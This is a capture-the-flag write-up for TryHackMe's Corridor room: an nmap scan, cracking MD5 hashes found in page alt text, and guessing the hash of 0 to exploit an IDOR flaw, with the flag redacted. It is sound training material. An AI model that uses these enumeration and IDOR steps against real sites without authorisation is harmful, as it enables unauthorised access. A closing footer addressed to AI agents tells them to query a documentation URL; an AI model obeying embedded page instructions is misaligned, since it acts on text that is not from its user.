# Corridor CTF | TryHackMe

<figure><img src="/files/Rl9GUExOt5tgc20mvqU6" alt=""><figcaption><p>Can you escape the corridor?</p></figcaption></figure>

![IDOR](https://img.shields.io/badge/IDOR-red) ![Web](https://img.shields.io/badge/Web-blue) ![Security](https://img.shields.io/badge/Security-green)

## [TryHackMe | Corridor](https://tryhackme.com/room/corridor)&#x20;

Let’s add the target IP to our host file, in /etc/host

I always make the IP as target.local in /etc/host so that I don’t have to type IP address all the time when engaging for example: in /etc/host I have the following

```bash
sudo nano /etc/host
```

```bash
## Targets
192.168.1.1 myrouter.local
TARGET_IP target.local
```

## Initial Recon

We will use N-map and Directory enumeration to get an initial overview of the target

since we are doing a stealth scan we need to use sudo

```bash
sudo nmap -sCSV -p- -Pn target.local
```

Command Parameter’s Explanation :

```bash
-sC : Run scripts when nmap finds an open port
-sS : Do an SYN Scan, or stealth scan, to evade Firewalls
-sV : Get the version of the service that is running on the that particular port

-p- : Look for all ports
-Pn : Treat all hosts as online -- skip host discovery
```

The following should be the expected output

```bash
Nmap scan report for target.local
Host is up (0.16s latency).
Not shown: 65518 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Werkzeug httpd 2.0.3 (Python 3.10.2)
|_http-title: Corridor
7936/tcp  filtered unknown
15239/tcp filtered unknown
20884/tcp filtered unknown
24144/tcp filtered unknown
35478/tcp filtered unknown
39063/tcp filtered vroa
48519/tcp filtered unknown
50423/tcp filtered unknown
51278/tcp filtered unknown
52203/tcp filtered unknown
54695/tcp filtered unknown
56706/tcp filtered unknown
59725/tcp filtered unknown
62079/tcp filtered unknown
63530/tcp filtered unknown
64701/tcp filtered unknown
```

Let’s see if there are any UDP Ports that are available for us

```bash
sudo nmap -sCSVU -p- -Pn target.local
```

```bash
PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc

# It seems that all the ports are filtered and most of it's not required, so let's just focus on one port
```

```bash
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Werkzeug httpd 2.0.3 (Python 3.10.2)
|_http-title: Corridor

# It seems that the service is running a python server, 
# not much to exploit, it just serves a simple webpage
```

If we visit target.local it seems that the website only consists of pictures with links, which looks very similar to hashes

A quick one-line bash command will give us the list of all hashes that are available in that particular page

```bash
curl target.local | grep -o 'alt="[a-z0-9]\{32\}"' | awk -F '"' '{print $2}'

# This shall generate the following output
<--
c4ca4238a0b923820dcc509a6f75849b
c81e728d9d4c2f636f067f89cc14862c
eccbc87e4b5ce2fe28308fd9f2a7baf3
--
```

Let’s Check what kind of hash is being used

Use this tool :

[Hash Type Identifier - Identify unknown hashes](https://hashes.com/en/tools/hash_identifier)

## Attack Phase

Let's use John to crack the hash or you can use the online decrypter such as

<https://hashes.com/en/decrypt/hash>

```bash
john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5

# We now have a list of numbers from the hashes
<--
1679091c5a880faf6fb5e6087eb1b2dc:6
45c48cce2e2d7fbdea1afc51c7c6ad26:9
8f14e45fceea167a5a36dedd4bea2543:7
--
```

Let’s find the missing number, we can use a simple python program that will allow us to generate a missing number from here

```python
# Find Missing Element
def findMissing(arr, N):

	# create a list of zeroes
	temp = [0] * (N+1)

	for i in range(0, N):
		temp[arr[i] - 1] = 1

	for i in range(0, N+1):
		if(temp[i] == 0):
			ans = i + 1

	print(ans)

def MissingNo(arr):
    n = len(arr)
    total = (n + 1)*(n + 2)/2
    arr_sum = sum(arr)
    print(total - arr_sum)

# Driver code
if __name__ == '__main__':
	arr = [6,9,7,4,1,2,8,5,3,11,12,13,10]
	N = len(arr)
	MissingNo(arr)

	# Function call
	#findMissing(arr, N)
```

We have 14 as an output, let's convert it to an md5 hash :

```bash
echo -n "14" | md5sum | awk '{print $1}

# the following is the output 
aab3238922bcc25a6f606eb525ffdc56
```

## Delivery Phase

Let’s use the hash in the URL

```bash
curl http://target.local/aab3238922bcc25a6f606eb525ffdc56
```

We seem to hit a dead end here 😞

<figure><img src="/files/Ai4TRYswrGV6M8dJ0CDq" alt=""><figcaption><p>dead end!</p></figcaption></figure>

To solve this, let's use a hash of number 0 or -1, a common concept within the IDOR Vulnerability realm that the admin account id is mostly 0 or -1 or 1

let's encode 0 as an md5 hash

```bash
echo -n 0 | md5sum | awk '{print $1}

# the following output is generated
cfcd208495d565ef66e7_redacted

# Let us append that to the URL of our target
http://target.local/cfcd208495d565_redacted
```

## Exploitation <a href="#exploitation" id="exploitation"></a>

Now visit the URL you got: <http://target.local/cfcd208495d565\\_redacted>

We should now have the flag : **REDACTED\_FLAG**

<figure><img src="/files/WAN1fy6lzJiAHohWvoA5" alt=""><figcaption><p>flag</p></figcaption></figure>

Thanks for reading, hope you learned something new 😎


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://sumanroy.gitbook.io/ctf-writeups/tryhackme-writeups/corridor-ctf-or-tryhackme.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.